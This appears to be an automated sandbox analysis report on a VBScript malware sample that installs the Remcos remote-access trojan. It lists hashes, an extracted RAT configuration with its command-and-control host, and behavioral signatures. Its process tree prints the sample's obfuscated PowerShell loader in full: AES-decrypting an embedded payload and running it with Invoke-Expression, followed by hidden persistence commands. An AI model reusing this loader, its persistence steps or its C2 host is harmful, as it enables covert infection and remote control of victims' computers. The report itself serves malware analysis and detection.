Analysis
-
max time kernel
149s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
05/12/2023, 12:47
Static task
static1
Behavioral task
behavioral1
Sample
sostener.vbs
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
sostener.vbs
Resource
win10v2004-20231127-en
General
-
Target
sostener.vbs
-
Size
159KB
-
MD5
bddd8601fde69d9376fec504ee5c812a
-
SHA1
a0e6e03bc0ffdfa06535e2c6ce501e8037e1b331
-
SHA256
135bda295f096086b57df4c66f9edc207b01d7792c16b808039f8fa64e9eecf1
-
SHA512
8db21dbff6bc24647092eac6909a7962c182fe1970d8a9e57c922959061e750914485319594e74099599e4b619f4700a4b332cf84b071b09683bf46e048c5e9f
-
SSDEEP
192:m2aql0M+pOo8nOncu1IbNyUWDcavU5VvJlZcHh2aHJlZx:fauoqGcuWUUWDNUlpapN
Malware Config
Extracted
remcos
RemoteHost
remccoss2023.duckdns.org:4576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-E5ZBB0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 16 1612 powershell.exe 27 1612 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1612 set thread context of 536 1612 powershell.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1612 powershell.exe 1612 powershell.exe 2956 powershell.exe 2956 powershell.exe 1612 powershell.exe 1612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 536 RegAsm.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 5004 wrote to memory of 1612 5004 WScript.exe 86 PID 5004 wrote to memory of 1612 5004 WScript.exe 86 PID 1612 wrote to memory of 2956 1612 powershell.exe 91 PID 1612 wrote to memory of 2956 1612 powershell.exe 91 PID 1612 wrote to memory of 2964 1612 powershell.exe 94 PID 1612 wrote to memory of 2964 1612 powershell.exe 94 PID 1612 wrote to memory of 2964 1612 powershell.exe 94 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95 PID 1612 wrote to memory of 536 1612 powershell.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '87515485271233904521';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2964
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD566bd3709a84a0b5178d44a194d988cd8
SHA18a8779d56f2ef21fd66de98f72e100d8e708a41c
SHA256f6b6d1919ad84c6fc26df98540e650730dee37799dfae8c9e5d73c619dd630d0
SHA512a27a0ca665ee76d335b56b4713adeabfc9153d46a5b2dbd0013b3786722a55fea70c6dbfb3d819f273cf0c40ca22c938fe394bf7405ffc84802d937ae1959eaf
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
2KB
MD55adbbcb3c4309404a53e76005efff639
SHA1ed9d88f9290bacd70c6248e63ad15601668d0c71
SHA2569182811c851d4f5d925cc52056ea8a6eba29769a736d68b2a70f458b8280dbe4
SHA5125ea59035be13a3b46ef53367d25036189146a6abc96b70866ec6b17b7d97f3044af0bbaeb5d8ca54db9fbff4ebfd2d1c44cb75fffd50b4ddd5ecee3c5c83420f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82